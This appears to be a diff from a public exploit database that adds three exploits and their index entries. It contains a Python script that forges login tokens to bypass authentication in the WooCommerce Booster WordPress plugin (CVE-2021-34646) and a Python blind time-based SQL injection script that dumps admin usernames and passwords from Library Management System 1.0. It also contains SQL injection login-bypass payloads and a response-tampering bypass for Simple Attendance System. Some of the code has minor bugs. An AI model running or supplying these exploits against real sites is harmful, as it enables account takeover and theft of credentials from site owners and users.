DB: 2021-09-18

3 changes to exploits/shellcodes

WordPress Plugin WooCommerce Booster Plugin 5.4.3 - Authentication Bypass
Library Management System 1.0 - Blind Time-Based SQL Injection (Unauthenticated)
Simple Attendance System 1.0 - Authenticated bypass

exploits/php/webapps/50299.py

@@ -0,0 +1,79 @@
+# Exploit Title: WordPress Plugin WooCommerce Booster Plugin 5.4.3 - Authentication Bypass
+# Date: 2021-09-16
+# Exploit Author: Sebastian Kriesten (0xB455)
+# Contact: https://twitter.com/0xB455
+#
+# Affected Plugin: Booster for WooCommerce
+# Plugin Slug: woocommerce-jetpack
+# Vulnerability disclosure: https://www.wordfence.com/blog/2021/08/critical=-authentication-bypass-vulnerability-patched-in-booster-for-woocommerce/
+# Affected Versions: <= 5.4.3
+# Fully Patched Version: >= 5.4.4
+# CVE: CVE-2021-34646
+# CVSS Score: 9.8 (Critical)
+# Category: webapps
+#
+# 1:
+# Goto: https://target.com/wp-json/wp/v2/users/
+# Pick a user-ID (e.g. 1 - usualy is the admin)
+#
+# 2:
+# Attack with: ./exploit_CVE-2021-34646.py https://target.com/ 1
+#
+# 3:
+# Check-Out  out which of the generated links allows you to access the system
+#
+import requests,sys,hashlib
+import argparse
+import datetime
+import email.utils
+import calendar
+import base64
+
+B = "\033[94m"
+W = "\033[97m"
+R = "\033[91m"
+RST = "\033[0;0m"
+
+parser = argparse.ArgumentParser()
+parser.add_argument("url", help="the base url")
+parser.add_argument('id', type=int, help='the user id', default=1)
+args = parser.parse_args()
+id = str(args.id)
+url = args.url
+if args.url[-1] != "/": # URL needs trailing /
+        url = url + "/"
+
+verify_url= url + "?wcj_user_id=" + id
+r = requests.get(verify_url)
+
+if r.status_code != 200:
+        print("status code != 200")
+        print(r.headers)
+        sys.exit(-1)
+
+def email_time_to_timestamp(s):
+    tt = email.utils.parsedate_tz(s)
+    if tt is None: return None
+    return calendar.timegm(tt) - tt[9]
+
+date = r.headers["Date"]
+unix = email_time_to_timestamp(date)
+
+def printBanner():
+    print(f"{W}Timestamp: {B}" + date)
+    print(f"{W}Timestamp (unix): {B}" + str(unix) + f"{W}\n")
+    print("We need to generate multiple timestamps in order to avoid delay related timing errors")
+    print("One of the following links will log you in...\n")
+
+printBanner()
+
+
+
+for i in range(3): # We need to try multiple timestamps as we don't get the exact hash time and need to avoid delay related timing errors
+        hash = hashlib.md5(str(unix-i).encode()).hexdigest()
+        print(f"{W}#" + str(i) + f" link for hash {R}"+hash+f"{W}:")
+        token='{"id":"'+ id +'","code":"'+hash+'"}'
+        token = base64.b64encode(token.encode()).decode()
+        token = token.rstrip("=") # remove trailing =
+        link = url+"my-account/?wcj_verify_email="+token
+        print(link + f"\n{RST}")

exploits/php/webapps/50300.py

@@ -0,0 +1,148 @@
+# Exploit Title: Library Management System 1.0 - Blind Time-Based SQL Injection (Unauthenticated)
+# Exploit Author: Bobby Cooke (@0xBoku) & Adeeb Shah (@hyd3sec)
+# Date: 16/09/2021
+# Vendor Homepage: https://www.sourcecodester.com/php/12469/library-management-system-using-php-mysql.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/librarymanagement.zip
+# Vendor: breakthrough2
+# Tested on: Kali Linux, Apache, Mysql
+# Version: v1.0
+# Exploit Description:
+# Library Management System v1.0 suffers from an unauthenticated SQL Injection Vulnerability allowing remote attackers to dump the SQL database using a Blind SQL Injection attack.
+# Exploitation Walkthrough: https://0xboku.com/2021/09/14/0dayappsecBeginnerGuide.html
+import requests,argparse
+from colorama import (Fore as F, Back as B, Style as S)
+
+BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT
+def bullet(char,color):
+    C=FB if color == 'B' else FR if color == 'R' else FG
+    return SB+C+'['+ST+SB+char+SB+C+']'+ST+' '
+info,err,ok = bullet('-','B'),bullet('!','R'),bullet('+','G')
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+proxies         = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
+
+# POST /LibraryManagement/fine-student.php
+# inject' UNION SELECT IF(SUBSTRING(password,1,1) = '1',sleep(1),null) FROM admin WHERE adminId=1; -- kamahamaha
+def sqliPayload(char,position,userid,column,table):
+    sqli  = 'inject\' UNION SELECT IF(SUBSTRING('
+    sqli += str(column)+','
+    sqli += str(position)+',1) = \''
+    sqli += str(char)+'\',sleep(1),null) FROM '
+    sqli += str(table)+' WHERE adminId='
+    sqli += str(userid)+'; -- kamahamaha'
+    return sqli
+
+chars = [ 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o',
+          'p','q','r','s','t','u','v','w','x','y','z','A','B','C','D',
+          'E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S',
+          'T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7',
+          '8','9','@','#']
+
+def postRequest(URL,sqliReq,char,position,pxy):
+    sqliURL = URL
+    params = {"check":1,"id":sqliReq}
+    if pxy:
+        req = requests.post(url=sqliURL, data=params, verify=False, proxies=proxies,timeout=10)
+    else:
+        req = requests.post(url=sqliURL, data=params, verify=False, timeout=10)
+    #print("{} : {}".format(char,req.elapsed.total_seconds()))
+    return req.elapsed.total_seconds()
+
+def theHarvester(target,CHARS,url,pxy):
+    #print("Retrieving: {} {} {}".format(target['table'],target['column'],target['id']))
+    position = 1
+    theHarvest = ""
+    while position < 8:
+        for char in CHARS:
+            sqliReq = sqliPayload(char,position,target['id'],target['column'],target['table'])
+            if postRequest(url,sqliReq,char,position,pxy) > 1:
+                theHarvest += char
+                break;
+        position += 1
+    return theHarvest
+
+class userObj:
+    def __init__(self,username,password):
+        self.username = username
+        self.password = password
+
+class tableSize:
+    def __init__(self,sizeU,sizeP):
+        self.sizeU = sizeU
+        self.sizeP = sizeP
+        self.uTitle = "Admin Usernames"+" "*(sizeU-15)+BR+" "+ST
+        self.pTitle = "Admin Passwords"+" "*(sizeP-15)+BR+" "+ST
+    def printHeader(self):
+        width = self.sizeU+self.sizeP+3
+        print(BR+" "*width+ST)
+        print(self.uTitle,self.pTitle)
+        print(BR+" "*width+ST)
+
+def printTableRow(user,size):
+    username = user.username
+    unLen = len(username)
+    if unLen < size.sizeU:
+        username = username+(" "*(size.sizeU - unLen))
+    else:
+        name = name[:size.sizeU]
+    username += BR+" "+ST
+    password = user.password
+    pLen = len(password)
+    if pLen < size.sizeP:
+        password = password+(" "*(size.sizeP - pLen))
+    else:
+        password = password[:size.sizeP]
+    password  += BR+" "+ST
+    print(username,password)
+
+
+def sig():
+    SIG  = SB+FY+"         .-----.._       ,--.\n"
+    SIG += FY+"         |  ..    >  ___ |  | .--.\n"
+    SIG += FY+"         |  |.'  ,'-'"+FR+"* *"+FY+"'-. |/  /__   __\n"
+    SIG += FY+"         |      </ "+FR+"*  *  *"+FY+" \   /   \\/   \\\n"
+    SIG += FY+"         |  |>   )  "+FR+" * *"+FY+"   /    \\        \\\n"
+    SIG += FY+"         |____..- '-.._..-'_|\\___|._..\\___\\\n"
+    SIG += FY+"             _______"+FR+"github.com/boku7"+FY+"_____\n"+ST
+    return SIG
+
+def argsetup():
+    about  = SB+FT+'Unauthenticated Blind Time-Based SQL Injection Exploit - Library Manager'+ST
+    parser = argparse.ArgumentParser(description=about)
+    parser.add_argument('targetHost',type=str,help='The DNS routable target hostname. Example: "http://0xBoku.com"')
+    parser.add_argument('DumpXAdmins',type=int,help='Number of admin credentials to dump. Example: 5')
+    parser.add_argument('-p','--proxy',type=str,help='<127.0.0.1:8080> Proxy requests sent')
+    args = parser.parse_args()
+    if args.proxy:
+        regex = '^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}:[0-9]{2,5}$'
+        if re.match(regex,args.proxy,re.IGNORECASE):
+            args.proxy = {'http':'http://{}'.format(args.proxy),'https':'https://{}'.format(args.proxy)}
+        else:
+            print('{}Error:   Supplied proxy argument {} fails to match regex {}'.format(err,args.proxy,regex))
+            print('{}Example: {} -p "127.0.0.1:8080"'.format(err,sys.argv[0]))
+            sys.exit(-1)
+    else:
+        proxy = False
+    return args
+
+if __name__ == "__main__":
+    header = SB+FT+'               '+FR+' Bobby '+FR+'"'+FR+'boku'+FR+'"'+FR+' Cooke\n'+ST
+    print(header)
+    print(sig())
+    args   = argsetup()
+    host   = args.targetHost
+    pxy    = args.proxy
+    admins = args.DumpXAdmins
+    PATH   = host+"/LibraryManagement/fine-student.php"
+    size  = tableSize(20,20)
+    size.printHeader()
+    dumpnumber = 1
+    while dumpnumber <= admins:
+        adminUsername  = { "id":dumpnumber, "table":"admin", "column":"username"}
+        adminUsername  = theHarvester(adminUsername,chars,PATH,pxy)
+        adminPassword  = { "id":dumpnumber, "table":"admin", "column":"password"}
+        adminPass = theHarvester(adminPassword,chars,PATH,pxy)
+        adminUser = userObj(adminUsername,adminPass)
+        printTableRow(adminUser,size)
+        # print("Admin's Username is: {}".format(adminUsername))
+        # print("Admin's Password is: {}".format(adminPass))
+        dumpnumber += 1

exploits/php/webapps/50301.txt

@@ -0,0 +1,33 @@
+# Exploit Title: Simple Attendance System 1.0 - Authenticated bypass
+# Exploit Author: Abdullah Khawaja (hax.3xploit)
+# Date: September 17, 2021
+# Vendor Homepage: https://www.sourcecodester.com/php/14948/simple-attendance-system-php-and-sqlite-free-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/attendance_0.zip
+# Tested on: Linux, windows
+# Vendor: oretnom23
+# Version: v1.0
+
+# Exploit Description:
+Simple Attendance System, is prone to multiple vulnerabilities.
+Easy authentication bypass vulnerability on the application
+allowing the attacker to login
+
+
+----- PoC: Authentication Bypass -----
+
+Administration Panel: http://localhost/attendance/login.php
+
+Username: admin' or ''=' -- -+
+Password: admin' or ''=' -- -+
+
+
+----- PoC-2: Authentication Bypass -----
+
+Steps:
+1. Enter wrong crendentials http://localhost/attendance/login.php
+2. Capture the request in burp and send it to repeater.
+3. Forward the request.
+4. In response tab, replace :
+    {"status":"failed","msg":"Invalid username or password."}
+                with
+    {"status":"success","msg":"Login successfully."}

files_exploits.csv

@@ -44417,3 +44417,6 @@ id,file,description,date,author,type,platform,port
 50295,exploits/hardware/webapps/50295.txt,"Seowon 130-SLC router - 'queriesCnt' Remote Code Execution (Unauthenticated)",1970-01-01,"Aryan Chehreghani",webapps,hardware,
 50296,exploits/php/webapps/50296.py,"Evolution CMS 3.1.6 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php,
 50297,exploits/php/webapps/50297.py,"AlphaWeb XE - File Upload Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Ricardo Ruiz",webapps,php,
+50299,exploits/php/webapps/50299.py,"WordPress Plugin WooCommerce Booster Plugin 5.4.3 - Authentication Bypass",1970-01-01,0xB455,webapps,php,
+50300,exploits/php/webapps/50300.py,"Library Management System 1.0 - Blind Time-Based SQL Injection (Unauthenticated)",1970-01-01,boku,webapps,php,
+50301,exploits/php/webapps/50301.txt,"Simple Attendance System 1.0 - Authenticated bypass",1970-01-01,"Abdullah Khawaja",webapps,php,